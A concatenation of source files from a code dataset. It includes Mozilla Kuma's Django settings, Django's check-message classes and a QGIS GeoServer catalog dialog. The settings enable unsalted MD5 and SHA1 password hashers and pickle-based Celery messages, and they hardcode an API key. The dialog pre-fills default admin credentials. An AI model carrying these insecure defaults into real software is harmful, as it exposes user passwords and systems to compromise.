'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'kuma.core.anonymous.AnonymousIdentityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'kuma.users.middleware.BanMiddleware',
'waffle.middleware.WaffleMiddleware',
)
# Auth
AUTHENTICATION_BACKENDS = (
'allauth.account.auth_backends.AuthenticationBackend',
)
AUTH_USER_MODEL = 'users.User'
PASSWORD_HASHERS = (
'kuma.users.backends.Sha256Hasher',
'django.contrib.auth.hashers.SHA1PasswordHasher',
'django.contrib.auth.hashers.MD5PasswordHasher',
'django.contrib.auth.hashers.UnsaltedMD5PasswordHasher',
)
USER_AVATAR_PATH = 'uploads/avatars/'
DEFAULT_AVATAR = MEDIA_URL + 'img/avatar.png'
AVATAR_SIZES = [ # in pixels
34, # wiki document page
48, # profile_link helper
200, # profile pages
220, # default, e.g. used in feeds
]
ACCOUNT_ACTIVATION_DAYS = 30
MAX_AVATAR_FILE_SIZE = 131072 # 100k, in bytes
ROOT_URLCONF = 'urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates"
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
path('templates'),
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'django.contrib.staticfiles.finders.FileSystemFinder',
)
# TODO: Figure out why changing the order of apps (for example, moving taggit
# higher in the list) breaks tests.
INSTALLED_APPS = (
# django
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'flat',
'django.contrib.admin',
'django.contrib.sitemaps',
'django.contrib.staticfiles',
# MDN
'kuma.core',
'kuma.feeder',
'kuma.landing',
'kuma.search',
'kuma.users',
'kuma.wiki',
'kuma.attachments',
'allauth',
'allauth.account',
'allauth.socialaccount',
'kuma.users.providers.persona',
'kuma.users.providers.github',
# DEMOS
'kuma.demos',
'kuma.contentflagging',
'kuma.actioncounters',
# util
'jingo_minify',
'product_details',
'tower',
'smuggler',
'constance.backends.database',
'constance',
'waffle',
'soapbox',
'kuma.authkeys',
'tidings',
'djcelery',
'taggit',
'dbgettext',
'honeypot',
'cacheback',
'kuma.dashboards',
'statici18n',
'rest_framework',
# testing.
'django_nose',
# other
'kuma.humans',
)
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
NOSE_ARGS = [
'--traverse-namespace', # make sure `./manage.py test kuma` works
]
# Feed fetcher config
FEEDER_TIMEOUT = 6 # in seconds
def JINJA_CONFIG():
import jinja2
from django.conf import settings
from django.core.cache.backends.memcached import MemcachedCache
from django.core.cache import caches
cache = caches['memcache']
config = {'extensions': ['jinja2.ext.i18n', 'tower.template.i18n',
'jinja2.ext.with_', 'jinja2.ext.loopcontrols',
'jinja2.ext.autoescape'],
'finalize': lambda x: x if x is not None else ''}
if isinstance(cache, MemcachedCache) and not settings.DEBUG:
# We're passing the _cache object directly to jinja because
# Django can't store binary directly; it enforces unicode on it.
# Details: http://jinja.pocoo.org/2/documentation/api#bytecode-cache
# and in the errors you get when you try it the other way.
bc = jinja2.MemcachedBytecodeCache(cache._cache,
"%s:j2:" % settings.CACHE_PREFIX)
config['cache_size'] = -1 # Never clear the cache
config['bytecode_cache'] = bc
return config
# Let Tower know about our additional keywords.
# DO NOT import an ngettext variant as _lazy.
TOWER_KEYWORDS = {
'_lazy': None,
}
# Tells the extract script what files to look for l10n in and what function
# handles the extraction. The Tower library expects this.
DOMAIN_METHODS = {
'messages': [
('vendor/**', 'ignore'),
('kuma/dashboards/**', 'ignore'),
('kuma/core/**', 'ignore'),
('kuma/**.py',
'tower.management.commands.extract.extract_tower_python'),
('**/templates/**.html',
'tower.management.commands.extract.extract_tower_template'),
('**/templates/**.ltxt',
'tower.management.commands.extract.extract_tower_template'),
],
'javascript': [
# We can't say **.js because that would dive into any libraries.
('media/js/libs/ckeditor/plugins/mdn-link/**.js', 'javascript')
],
}
# These domains will not be merged into messages.pot and will use separate PO
# files. See the following URL for an example of how to set these domains
# in DOMAIN_METHODS.
# http://github.com/jbalogh/zamboni/blob/d4c64239c24aa2f1e91276909823d1d1b290f0ee/settings.py#L254
STANDALONE_DOMAINS = [
'javascript',
]
# If you have trouble extracting strings with Tower, try setting this
# to True
TOWER_ADD_HEADERS = True
# Bundles for JS/CSS Minification
JINGO_MINIFY_USE_STATIC = False
CLEANCSS_BIN = '/usr/local/bin/cleancss'
UGLIFY_BIN = '/usr/bin/uglifyjs'
MINIFY_BUNDLES = {
'css': {
'mdn': (
'css/font-awesome.css',
'css/main.css',
),
'jquery-ui': (
'js/libs/jquery-ui-1.10.3.custom/css/ui-lightness/jquery-ui-1.10.3.custom.min.css',
'css/jqueryui/moz-jquery-plugins.css',
'css/jquery-ui-customizations.css',
),
'demostudio': (
'css/demos.css',
),
'devderby': (
'css/devderby.css',
),
'gaia': (
'css/gaia.css',
),
'home': (
'css/home.css',
'js/libs/owl.carousel/owl-carousel/owl.carousel.css',
'js/libs/owl.carousel/owl-carousel/owl.theme.css',
),
'search': (
'css/search.css',
),
'search-suggestions': (
'css/search-suggestions.css',
),
'wiki': (
'css/wiki.css',
'css/zones.css',
'css/diff.css',
'js/libs/prism/themes/prism.css',
'js/libs/prism/plugins/line-highlight/prism-line-highlight.css',
'js/libs/prism/plugins/ie8/prism-ie8.css',
'js/prism-mdn/plugins/line-numbering/prism-line-numbering.css',
'js/prism-mdn/components/prism-json.css',
'css/wiki-syntax.css',
),
'wiki-revisions': (
'css/wiki-revisions.css',
),
'wiki-edit': (
'css/wiki-edit.css',
),
'sphinx': (
'css/wiki.css',
'css/sphinx.css',
),
'users': (
'css/users.css',
),
'tagit': (
'css/libs/jquery.tagit.css',
),
'promote': (
'css/promote.css',
),
'error': (
'css/error.css',
),
'error-404': (
'css/error.css',
'css/error-404.css',
),
'calendar': (
'css/calendar.css',
),
'profile': (
'css/profile.css',
),
'dashboards': (
'css/dashboards.css',
'css/diff.css',
),
'newsletter': (
'css/newsletter.css',
),
'submission': (
'css/submission.css',
),
'user-banned': (
'css/user-banned.css',
),
'error-403-alternate': (
'css/error-403-alternate.css',
),
'fellowship': (
'css/fellowship.css',
),
'mdn10': (
'css/mdn10.css',
),
},
'js': {
'main': (
'js/libs/jquery-2.1.0.js',
'js/components.js',
'js/analytics.js',
'js/main.js',
'js/auth.js',
'js/fonts.js',
),
'home': (
'js/libs/owl.carousel/owl-carousel/owl.carousel.js',
'js/home.js'
),
'popup': (
'js/libs/jquery-ui-1.10.3.custom/js/jquery-ui-1.10.3.custom.min.js',
'js/modal-control.js',
),
'profile': (
'js/profile.js',
'js/moz-jquery-plugins.js',
),
'social': (
'js/social.js',
),
'helpfulness': (
'js/helpfulness.js',
),
'demostudio': (
'js/libs/jquery.hoverIntent.minified.js',
'js/libs/jquery.scrollTo-1.4.2-min.js',
'js/demos.js',
'js/libs/jquery-ui-1.10.3.custom/js/jquery-ui-1.10.3.custom.min.js',
'js/modal-control.js',
),
'demostudio_devderby_landing': (
'js/demos-devderby-landing.js',
),
'jquery-ui': (
'js/libs/jquery-ui-1.10.3.custom/js/jquery-ui-1.10.3.custom.min.js',
'js/moz-jquery-plugins.js',
),
'libs/tagit': (
'js/libs/tag-it.js',
),
'search': (
'js/search.js',
'js/search-navigator.js',
),
'framebuster': (
'js/framebuster.js',
),
'syntax-prism': (
'js/libs/prism/prism.js',
'js/prism-mdn/components/prism-json.js',
'js/prism-mdn/plugins/line-numbering/prism-line-numbering.js',
'js/libs/prism/plugins/line-highlight/prism-line-highlight.js',
'js/syntax-prism.js',
),
'search-suggestions': (
'js/search-suggestions.js',
),
'wiki': (
'js/search-navigator.js',
'js/wiki.js',
'js/wiki-samples.js',
),
'wiki-edit': (
'js/wiki-edit.js',
'js/libs/tag-it.js',
'js/wiki-tags-edit.js',
),
'wiki-move': (
'js/wiki-move.js',
),
'newsletter': (
'js/newsletter.js',
),
'fellowship': (
'js/fellowship.js',
),
'fontfaceobserver': (
'js/libs/fontfaceobserver/fontfaceobserver-standalone.js',
),
},
}
#
# Session cookies
SESSION_COOKIE_SECURE = True
SESSION_COOKIE_HTTPONLY = True
# Cookie prefix from PHPBB settings.
PHPBB_COOKIE_PREFIX = 'phpbb3_jzxvr'
# Maximum length of the filename. Forms should use this and raise
# ValidationError if the length is exceeded.
# @see http://code.djangoproject.com/ticket/9893
# Columns are 250 but this leaves 50 chars for the upload_to prefix
MAX_FILENAME_LENGTH = 200
MAX_FILEPATH_LENGTH = 250
ATTACHMENT_HOST = 'mdn.mozillademos.org'
# Video settings, hard coded here for now.
# TODO: figure out a way that doesn't need these values
WIKI_VIDEO_WIDTH = 640
WIKI_VIDEO_HEIGHT = 480
IMAGE_MAX_FILESIZE = 1048576 # 1 megabyte, in bytes
THUMBNAIL_SIZE = 120 # Thumbnail size, in pixels
THUMBNAIL_UPLOAD_PATH = 'uploads/images/thumbnails/'
IMAGE_UPLOAD_PATH = 'uploads/images/'
# A string listing image mime types to accept, comma separated.
# String must not contain double quotes!
IMAGE_ALLOWED_MIMETYPES = 'image/jpeg,image/png,image/gif'
# Email
EMAIL_BACKEND = 'django.core.mail.backends.filebased.EmailBackend'
EMAIL_FILE_PATH = '/tmp/kuma-messages'
# Celery
import djcelery
djcelery.setup_loader()
BROKER_URL = 'amqp://kuma:kuma@developer-local:5672/kuma'
CELERY_ALWAYS_EAGER = True # For tests. Set to False for use.
CELERY_SEND_TASK_ERROR_EMAILS = True
CELERY_SEND_EVENTS = True
CELERY_SEND_TASK_SENT_EVENT = True
CELERY_TRACK_STARTED = True
CELERYD_LOG_LEVEL = logging.INFO
CELERYD_CONCURRENCY = 4
CELERY_RESULT_BACKEND = 'djcelery.backends.database:DatabaseBackend'
CELERYBEAT_SCHEDULER = 'djcelery.schedulers.DatabaseScheduler'
CELERY_ACCEPT_CONTENT = ['pickle']
CELERY_IMPORTS = (
'tidings.events',
)
CELERY_ANNOTATIONS = {
'cacheback.tasks.refresh_cache': {
'rate_limit': '120/m',
},
}
# Wiki rebuild settings
WIKI_REBUILD_TOKEN = 'kuma:wiki:full-rebuild'
WIKI_REBUILD_ON_DEMAND = False
# Anonymous user cookie
ANONYMOUS_COOKIE_NAME = 'KUMA_ANONID'
ANONYMOUS_COOKIE_MAX_AGE = 30 * 86400 # Seconds
# Top contributors cache settings
TOP_CONTRIBUTORS_CACHE_KEY = 'kuma:TopContributors'
TOP_CONTRIBUTORS_CACHE_TIMEOUT = 60 * 60 * 12
# Do not change this without also deleting all wiki documents:
WIKI_DEFAULT_LANGUAGE = LANGUAGE_CODE
TIDINGS_FROM_ADDRESS = 'notifications@developer.mozilla.org'
TIDINGS_CONFIRM_ANONYMOUS_WATCHES = True
# content flagging
DEMO_FLAG_REASONS = (
('notworking', _('This demo is not working for me')),
('inappropriate', _('This demo contains inappropriate content')),
('plagarised', _('This demo was not created by the author')),
)
WIKI_FLAG_REASONS = (
('bad', _('This article is spam/inappropriate')),
('unneeded', _('This article is obsolete/unneeded')),
('duplicate', _('This is a duplicate of another article')),
)
FLAG_REASONS = DEMO_FLAG_REASONS + WIKI_FLAG_REASONS
# bit.ly
BITLY_API_KEY = "SET ME IN SETTINGS_LOCAL"
BITLY_USERNAME = "SET ME IN SETTINGS_LOCAL"
GOOGLE_MAPS_API_KEY = "ABQIAAAAijZqBZcz-rowoXZC1tt9iRT5rHVQFKUGOHoyfP_4KyrflbHKcRTt9kQJVST5oKMRj8vKTQS2b7oNjQ"
# demo studio uploads
# Filesystem path where files uploaded for demos will be written
DEMO_UPLOADS_ROOT = path('media/uploads/demos')
# Base URL from where files uploaded for demos will be linked and served
DEMO_UPLOADS_URL = '/media/uploads/demos/'
CONSTANCE_BACKEND = 'constance.backends.database.DatabaseBackend'
# must be an entry in the CACHES setting!
CONSTANCE_DATABASE_CACHE_BACKEND = 'memcache'
# Settings and defaults controllable by Constance in admin
CONSTANCE_CONFIG = dict(
DEMO_BLACKLIST_OVERRIDE_EXTENSIONS=(
'jsgz datagz memgz',
'File extensions that override the mimetype blacklist in case of '
'an ambigous mimetype such as application/gzip',
),
DEMO_MAX_ZIP_FILESIZE=(
60 * 1024 * 1024,
"Max file size for zips uploaded to demo studio."
),
DEMO_MAX_FILESIZE_IN_ZIP=(
60 * 1024 * 1024,
"Max file size for files inside zip uploaded to demo studio."
),
DEMOS_DEVDERBY_CURRENT_CHALLENGE_TAG=(
"challenge:2011:september",
"Dev derby current challenge"
),
DEMOS_DEVDERBY_PREVIOUS_WINNER_TAG=(
"system:challenge:firstplace:2011:august",
"Tag used to find most recent winner for dev derby"
),
DEMOS_DEVDERBY_CHALLENGE_CHOICE_TAGS=(
' '.join([
"challenge:2011:september",
"challenge:2011:october",
"challenge:2011:november",
]),
"Dev derby choices displayed on submission form (space-separated tags)"
),
DEMOS_DEVDERBY_PREVIOUS_CHALLENGE_TAGS=(
' '.join([
"challenge:2013:june",
"challenge:2013:may",
"challenge:2013:april",
"challenge:2013:march",
"challenge:2013:february",
"challenge:2013:january",
"challenge:2012:december",
"challenge:2012:november",
"challenge:2012:october",
"challenge:2012:september",
"challenge:2012:august",
"challenge:2012:july",
"challenge:2012:june",
"challenge:2012:may",
"challenge:2012:april",
"challenge:2012:march",
"challenge:2012:february",
"challenge:2012:january",
"challenge:2011:december",
"challenge:2011:november",
"challenge:2011:october",
"challenge:2011:september",
"challenge:2011:august",
"challenge:2011:july",
"challenge:2011:june",
]),
"Dev derby tags for previous challenges (space-separated tags)"
),
DEMOS_DEVDERBY_HOMEPAGE_FEATURED_DEMO=(
0,
'The ID of the demo which should be featured on the new homepage structure'
),
BASKET_RETRIES=(
5,
'Number of time to retry basket post before giving up.'
),
BASKET_RETRY_WAIT=(
.5,
'How long to wait between basket api request retries. '
'We typically multiply this value by the retry number so, e.g., '
'the 4th retry waits 4*.5 = 2 seconds.'
),
BASKET_API_KEY=(
'',
'API Key to use for basket requests'
),
BETA_GROUP_NAME=(
'Beta Testers',
'Name of the django.contrib.auth.models.Group to use as beta testers'
),
KUMA_DOCUMENT_RENDER_TIMEOUT=(
180.0,
'Maximum seconds to wait before considering a rendering in progress or '
'scheduled as failed and allowing another attempt.'
),
KUMA_DOCUMENT_FORCE_DEFERRED_TIMEOUT=(
10.0,
'Maximum seconds to allow a document to spend rendering during the '
'response cycle before flagging it to be sent to the deferred rendering '
'queue for future renders.'
),
KUMASCRIPT_TIMEOUT=(
0.0,
'Maximum seconds to wait for a response from the kumascript service. '
'On timeout, the document gets served up as-is and without macro '
'evaluation as an attempt at graceful failure. NOTE: a value of 0 '
'disables kumascript altogether.'
),
KUMASCRIPT_MAX_AGE=(
600,
'Maximum acceptable age (in seconds) of a cached response from '
'kumascript. Passed along in a Cache-Control: max-age={value} header, '
'which tells kumascript whether or not to serve up a cached response.'
),
KUMA_CUSTOM_CSS_PATH=(
'/en-US/docs/Template:CustomCSS',
'Path to a wiki document whose raw content will be loaded as a CSS '
'stylesheet for the wiki base template. Will also cause the ?raw '
'parameter for this path to send a Content-Type: text/css header. Empty '
'value disables the feature altogether.',
),
KUMA_CUSTOM_SAMPLE_CSS_PATH=(
'/en-US/docs/Template:CustomSampleCSS',
'Path to a wiki document whose raw content will be loaded as a CSS '
'stylesheet for live sample template. Will also cause the ?raw '
'parameter for this path to send a Content-Type: text/css header. Empty '
'value disables the feature altogether.',
),
DIFF_CONTEXT_LINES=(
0,
'Number of lines of context to show in diff display.',
),
FEED_DIFF_CONTEXT_LINES=(
3,
'Number of lines of context to show in feed diff display.',
),
WIKI_ATTACHMENT_ALLOWED_TYPES=(
'image/gif image/jpeg image/png image/svg+xml text/html image/vnd.adobe.photoshop',
'Allowed file types for wiki file attachments',
),
KUMA_WIKI_IFRAME_ALLOWED_HOSTS=(
'^https?\:\/\/(developer-local.allizom.org|developer.allizom.org|mozillademos.org|testserver|localhost\:8000|(www.)?youtube.com\/embed\/(\.*))',
'Regex comprised of domain names that are allowed for IFRAME SRCs'
),
GOOGLE_ANALYTICS_ACCOUNT=(
'0',
'Google Analytics Tracking Account Number (0 to disable)',
),
OPTIMIZELY_PROJECT_ID=(
'',
'The ID value for optimizely Project Code script'
),
BLEACH_ALLOWED_TAGS=(
json.dumps([
'a', 'p', 'div',
]),
"JSON array of tags allowed through Bleach",
),
BLEACH_ALLOWED_ATTRIBUTES=(
json.dumps({
'*': ['id', 'class', 'style', 'lang'],
}),
"JSON object associating tags with lists of allowed attributes",
),
BLEACH_ALLOWED_STYLES=(
json.dumps([
'font-size', 'text-align',
]),
"JSON array listing CSS styles allowed on tags",
),
WIKI_DOCUMENT_TAG_SUGGESTIONS=(
json.dumps([
"Accessibility", "AJAX", "API", "Apps",
"Canvas", "CSS", "Device", "DOM", "Events",
"Extensions", "Firefox", "Firefox OS", "Games",
"Gecko", "Graphics", "Internationalization", "History", "HTML", "HTTP", "JavaScript", "Layout",
"Localization", "MDN", "Mobile", "Mozilla",
"Networking", "Persona", "Places", "Plugins", "Protocols",
"Reference", "Tutorial", "Landing",
"junk", "NeedsMarkupWork", "NeedsContent", "NeedsExample",
]),
"JSON array listing tag suggestions for documents"
),
SEARCH_FILTER_TAG_OPTIONS=(
json.dumps([
"Accessibility", "AJAX", "API", "Apps",
"Canvas", "CSS", "Device", "DOM", "Events",
"Extensions", "Firefox", "Firefox OS", "Games",
"Gecko", "Graphics", "Internationalization", "History", "HTML", "HTTP", "JavaScript", "Layout",
"Localization", "MDN", "Mobile", "Mozilla",
"Networking", "Persona", "Places", "Plugins", "Protocols",
"Reference", "Tutorial", "Landing",
"junk", "NeedsMarkupWork", "NeedsContent", "NeedsExample",
]),
"JSON array of tags that are enabled for search faceting"
),
SESSION_CLEANUP_CHUNK_SIZE=(
1000,
'Number of expired sessions to cleanup up in one go.',
),
WELCOME_EMAIL_FROM=(
"Janet Swisher <no-reply@mozilla.org>",
'Email address from which welcome emails will be sent',
),
EMAIL_LIST_FOR_FIRST_EDITS=(
"mdn-spam-watch@mozilla.com",
"Email address to which emails will be sent for users' first edits",
),
)
BASKET_URL = 'https://basket.mozilla.com'
BASKET_APPS_NEWSLETTER = 'app-dev'
KUMASCRIPT_URL_TEMPLATE = 'http://developer.mozilla.org:9080/docs/{path}'
# Elasticsearch related settings.
ES_DEFAULT_NUM_REPLICAS = 1
ES_DEFAULT_NUM_SHARDS = 5
ES_DEFAULT_REFRESH_INTERVAL = '5s'
ES_DISABLED = True
ES_INDEX_PREFIX = 'mdn'
ES_INDEXES = {'default': 'main_index'}
# Specify the extra timeout in seconds for the indexing ES connection.
ES_INDEXING_TIMEOUT = 30
ES_LIVE_INDEX = False
ES_URLS = ['localhost:9200']
LOG_LEVEL = logging.WARN
SYSLOG_TAG = 'http_app_kuma'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse',
},
},
'formatters': {
'default': {
'format': '{0}: %(asctime)s %(name)s:%(levelname)s %(message)s: '
'%(pathname)s:%(lineno)s'.format(SYSLOG_TAG),
}
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'default',
'level': LOG_LEVEL,
},
'mail_admins': {
'class': 'django.utils.log.AdminEmailHandler',
'filters': ['require_debug_false'],
'level': logging.ERROR,
},
},
'loggers': {
'kuma': {
'handlers': ['console'],
'propagate': True,
'level': logging.ERROR,
},
'django.request': {
'handlers': ['console'],
'propagate': True,
'level': logging.ERROR,
},
'elasticsearch': {
'handlers': ['console'],
'level': logging.ERROR,
},
'urllib3': {
'handlers': ['console'],
'level': logging.ERROR,
},
'cacheback': {
'handlers': ['console'],
'level': logging.ERROR,
}
},
}
CSRF_COOKIE_SECURE = True
X_FRAME_OPTIONS = 'DENY'
DBGETTEXT_PATH = 'kuma/core/'
DBGETTEXT_ROOT = 'translations'
def get_user_url(user):
from kuma.core.urlresolvers import reverse
return reverse('users.profile', args=[user.username])
ABSOLUTE_URL_OVERRIDES = {
'users.user': get_user_url
}
# Honor the X-Forwarded-Proto header for environments like local dev VM that
# uses Apache mod_proxy instead of mod_wsgi
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Auth and permissions related constants
LOGIN_URL = reverse_lazy('account_login')
LOGOUT_URL = reverse_lazy('account_logout')
LOGIN_REDIRECT_URL = reverse_lazy('home')
# django-allauth configuration
ACCOUNT_LOGOUT_REDIRECT_URL = '/'
ACCOUNT_DEFAULT_HTTP_PROTOCOL = 'https'
ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_LOGOUT_ON_GET = True
ACCOUNT_USERNAME_MIN_LENGTH = 3
ACCOUNT_ADAPTER = 'kuma.users.adapters.KumaAccountAdapter'
ACCOUNT_SIGNUP_FORM_CLASS = 'kuma.users.forms.NewsletterForm' # weird but needed
ACCOUNT_UNIQUE_EMAIL = False
SOCIALACCOUNT_ADAPTER = 'kuma.users.adapters.KumaSocialAccountAdapter'
SOCIALACCOUNT_EMAIL_VERIFICATION = 'mandatory'
SOCIALACCOUNT_EMAIL_REQUIRED = True
SOCIALACCOUNT_AUTO_SIGNUP = False # forces the use of the signup view
SOCIALACCOUNT_QUERY_EMAIL = True # used by the custom github provider
SOCIALACCOUNT_PROVIDERS = {
'persona': {
'AUDIENCE': 'https://developer.mozilla.org',
'REQUEST_PARAMETERS': {
'siteName': 'Mozilla Developer Network',
'siteLogo': '/media/img/opengraph-logo.png',
}
}
}
PERSONA_VERIFIER_URL = 'https://verifier.login.persona.org/verify'
PERSONA_INCLUDE_URL = 'https://login.persona.org/include.js'
HONEYPOT_FIELD_NAME = 'website'
# TODO: Once using DRF more we need to make that exception handler more generic
REST_FRAMEWORK = {
'EXCEPTION_HANDLER': 'kuma.search.utils.search_exception_handler'
}
|
mpl-2.0
|
petecummings/django
|
django/core/checks/messages.py
|
319
|
2383
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.utils.encoding import force_str, python_2_unicode_compatible
# Levels
DEBUG = 10
INFO = 20
WARNING = 30
ERROR = 40
CRITICAL = 50
@python_2_unicode_compatible
class CheckMessage(object):
def __init__(self, level, msg, hint=None, obj=None, id=None):
assert isinstance(level, int), "The first argument should be level."
self.level = level
self.msg = msg
self.hint = hint
self.obj = obj
self.id = id
def __eq__(self, other):
return all(getattr(self, attr) == getattr(other, attr)
for attr in ['level', 'msg', 'hint', 'obj', 'id'])
def __ne__(self, other):
return not (self == other)
def __str__(self):
from django.db import models
if self.obj is None:
obj = "?"
elif isinstance(self.obj, models.base.ModelBase):
# We need to hardcode ModelBase and Field cases because its __str__
# method doesn't return "applabel.modellabel" and cannot be changed.
obj = self.obj._meta.label
else:
obj = force_str(self.obj)
id = "(%s) " % self.id if self.id else ""
hint = "\n\tHINT: %s" % self.hint if self.hint else ''
return "%s: %s%s%s" % (obj, id, self.msg, hint)
def __repr__(self):
return "<%s: level=%r, msg=%r, hint=%r, obj=%r, id=%r>" % \
(self.__class__.__name__, self.level, self.msg, self.hint, self.obj, self.id)
def is_serious(self):
return self.level >= ERROR
def is_silenced(self):
from django.conf import settings
return self.id in settings.SILENCED_SYSTEM_CHECKS
class Debug(CheckMessage):
def __init__(self, *args, **kwargs):
super(Debug, self).__init__(DEBUG, *args, **kwargs)
class Info(CheckMessage):
def __init__(self, *args, **kwargs):
super(Info, self).__init__(INFO, *args, **kwargs)
class Warning(CheckMessage):
def __init__(self, *args, **kwargs):
super(Warning, self).__init__(WARNING, *args, **kwargs)
class Error(CheckMessage):
def __init__(self, *args, **kwargs):
super(Error, self).__init__(ERROR, *args, **kwargs)
class Critical(CheckMessage):
def __init__(self, *args, **kwargs):
super(Critical, self).__init__(CRITICAL, *args, **kwargs)
|
bsd-3-clause
|
yjacolin/qgis-geoserver-plugin
|
src/geoserverexplorer/gui/dialogs/catalogdialog.py
|
1
|
6939
|
from PyQt4 import QtGui, QtCore
from qgis.gui import *
from qgis.core import *
from geoserverexplorer.geoserver import pem
class DefineCatalogDialog(QtGui.QDialog):
def __init__(self, catalogs, parent = None):
super(DefineCatalogDialog, self).__init__(parent)
self.catalogs = catalogs
self.ok = False
self.initGui()
def initGui(self):
self.setWindowTitle('Catalog definition')
verticalLayout = QtGui.QVBoxLayout()
horizontalLayout = QtGui.QHBoxLayout()
horizontalLayout.setSpacing(30)
horizontalLayout.setMargin(0)
nameLabel = QtGui.QLabel('Catalog name')
nameLabel.setMinimumWidth(150)
self.nameBox = QtGui.QLineEdit()
settings = QtCore.QSettings()
name = settings.value('/GeoServer/LastCatalogName', 'Default GeoServer catalog')
self.nameBox.setText(name)
self.nameBox.setMinimumWidth(250)
horizontalLayout.addWidget(nameLabel)
horizontalLayout.addWidget(self.nameBox)
verticalLayout.addLayout(horizontalLayout)
horizontalLayout = QtGui.QHBoxLayout()
horizontalLayout.setSpacing(30)
horizontalLayout.setMargin(0)
urlLabel = QtGui.QLabel('URL')
urlLabel.setMinimumWidth(150)
self.urlBox = QtGui.QLineEdit()
url = settings.value('/GeoServer/LastCatalogUrl', 'http://localhost:8080/geoserver')
self.urlBox.setText(url)
self.urlBox.setMinimumWidth(250)
horizontalLayout.addWidget(urlLabel)
horizontalLayout.addWidget(self.urlBox)
verticalLayout.addLayout(horizontalLayout)
self.groupBox = QtGui.QGroupBox()
self.groupBox.setTitle("GeoServer Connection parameters")
self.groupBox.setLayout(verticalLayout)
layout = QtGui.QVBoxLayout()
layout.addWidget(self.groupBox)
self.spacer = QtGui.QSpacerItem(20,20, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
layout.addItem(self.spacer)
self.tabWidget = QtGui.QTabWidget()
tabBasicAuth = QtGui.QWidget()
tabBasicAuthLayout = QtGui.QVBoxLayout(tabBasicAuth)
horizontalLayout = QtGui.QHBoxLayout()
horizontalLayout.setSpacing(30)
horizontalLayout.setMargin(0)
usernameLabel = QtGui.QLabel('User name')
usernameLabel.setMinimumWidth(150)
self.usernameBox = QtGui.QLineEdit()
self.usernameBox.setText('admin')
self.usernameBox.setMinimumWidth(250)
horizontalLayout.addWidget(usernameLabel)
horizontalLayout.addWidget(self.usernameBox)
tabBasicAuthLayout.addLayout(horizontalLayout)
horizontalLayout = QtGui.QHBoxLayout()
horizontalLayout.setSpacing(30)
horizontalLayout.setMargin(0)
passwordLabel = QtGui.QLabel('Password')
passwordLabel.setMinimumWidth(150)
self.passwordBox = QtGui.QLineEdit()
self.passwordBox.setEchoMode(QtGui.QLineEdit.Password)
self.passwordBox.setText('geoserver')
self.passwordBox.setMinimumWidth(250)
horizontalLayout.addWidget(passwordLabel)
horizontalLayout.addWidget(self.passwordBox)
tabBasicAuthLayout.addLayout(horizontalLayout)
self.tabWidget.addTab(tabBasicAuth, "Basic")
try:
self.certWidget = QgsAuthConfigSelect( keypasssupported = False)
self.tabWidget.addTab(self.certWidget, "Configurations")
except NameError:
#for QGIS without PKI support
pass
verticalLayout3 = QtGui.QVBoxLayout()
verticalLayout3.addWidget(self.tabWidget)
self.authBox = QtGui.QGroupBox()
self.authBox.setTitle("Authentication")
self.authBox.setLayout(verticalLayout3)
verticalLayout.addWidget(self.authBox)
self.spacer = QtGui.QSpacerItem(20,20, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
layout.addItem(self.spacer)
self.buttonBox = QtGui.QDialogButtonBox(QtGui.QDialogButtonBox.Ok | QtGui.QDialogButtonBox.Close)
layout.addWidget(self.buttonBox)
self.setLayout(layout)
self.buttonBox.accepted.connect(self.okPressed)
self.buttonBox.rejected.connect(self.cancelPressed)
self.resize(400,200)
def okPressed(self):
self.url = unicode(self.urlBox.text().strip('/') + '/rest')
if not self.url.startswith('http'):
self.url = 'http://%s' % self.url
if self.tabWidget.currentIndex() == 0:
self.username = unicode(self.usernameBox.text())
self.password = unicode(self.passwordBox.text())
self.certfile = None
self.keyfile = None
self.cafile = None
self.authid = None
else:
self.username = None
self.password = None
self.authid = self.certWidget.configId()
authtype = QgsAuthManager.instance().configProviderType(self.authid);
if authtype == QgsAuthType.None or authtype == QgsAuthType.Unknown:
QtGui.QMessageBox.warning(self, "Authentication needed",
"Please specify a valid authentication for connecting to the catalog")
return
if authtype == QgsAuthType.Basic:
configbasic = QgsAuthConfigBasic()
QgsAuthManager.instance().loadAuthenticationConfig(self.authid, configbasic, True)
self.password = configbasic.password()
self.username = configbasic.username()
elif authtype in [QgsAuthType.PkiPaths, QgsAuthType.PkiPkcs12]:
self.certfile, self.keyfile, self.cafile = pem.getPemPkiPaths(self.authid, authtype)
else:
QtGui.QMessageBox.warning(self, "Unsupported authentication",
"The selected authentication type is not supported")
return
self.name = unicode(self.nameBox.text())
name = self.name
i = 2
while name in self.catalogs.keys():
name = self.name + "_" + str(i)
i += 1
self.name = name
settings = QtCore.QSettings()
settings.setValue('/GeoServer/LastCatalogName', self.nameBox.text())
settings.setValue('/GeoServer/LastCatalogUrl', self.urlBox.text())
saveCatalogs = bool(settings.value("/GeoServer/Settings/GeoServer/SaveCatalogs", True, bool))
if saveCatalogs:
settings.beginGroup("/GeoServer/Catalogs/" + self.name)
settings.setValue("url", self.url);
if self.authid is not None:
settings.setValue("authid", self.authid)
else:
settings.setValue("username", self.username)
settings.endGroup()
self.ok = True
self.close()
def cancelPressed(self):
self.ok = False
self.close()
|
gpl-2.0
|
Rona111/sale_commission
|
__unported__/production_costs/fixed_cost.py
|
3
|
2109
|
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
